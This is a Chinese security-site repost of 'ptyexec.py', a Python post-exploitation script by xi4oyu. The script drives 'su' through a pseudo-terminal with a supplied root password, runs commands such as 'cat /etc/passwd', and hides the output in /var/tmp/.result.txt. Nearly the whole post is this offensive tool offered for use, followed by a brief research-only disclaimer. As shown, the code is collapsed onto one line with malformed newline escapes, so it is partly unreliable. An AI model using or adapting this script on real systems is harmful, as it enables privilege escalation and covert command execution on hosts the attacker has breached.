# 鬼仔:xi4oyu最近搞了一个站,这个是他新站开张放出来的。
作者:xi4oyu
新站开张,放出来吧。以前是应包总之约写的。前后也没给 过几个人,算是个伪私有版。
#!/usr/bin/env python #For God sake, Keep it priv4t3 import sys,os,time,pty def usage(): print "ptyexec.py: fuck the firewall block up" print "By xi4oyu http://www.pentestday.com" print "Usage: ptyexec.py <username> <passwd> <command>" print 'Ext: ptyexec.py root 123456 "cat /etc/passwd"' print 'Result will be located in /var/tmp' sys.exit(0) def fuck_child(pipein): os.dup2(pipein,0) fd = open("/var/tmp/.result.txt","a") os.dup2(fd.fileno(),1) os.dup2(fd.fileno(),2) pty.spawn("/bin/sh") print "GAGA..I'm back,Alt it never be happened" sys.exit(0) def fuck_it_up(user,passwd,command): pipein,pipeout = os.pipe() #Fork the fucking child if os.fork() == 0: fuck_child(pipein) else: time.sleep(2) os.write(pipeout,'su - %s/n'% user) time.sleep(2) os.write(pipeout,'%s/n' % passwd) time.sleep(2) os.write(pipeout,'%s/n' % command) time.sleep(2) os.write(pipeout,'exit/n'); time.sleep(2) sys.exit(0) if __name__ == "__main__": if len(sys.argv) != 4: usage() fuck_it_up(sys.argv[1],sys.argv[2],sys.argv[3])免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论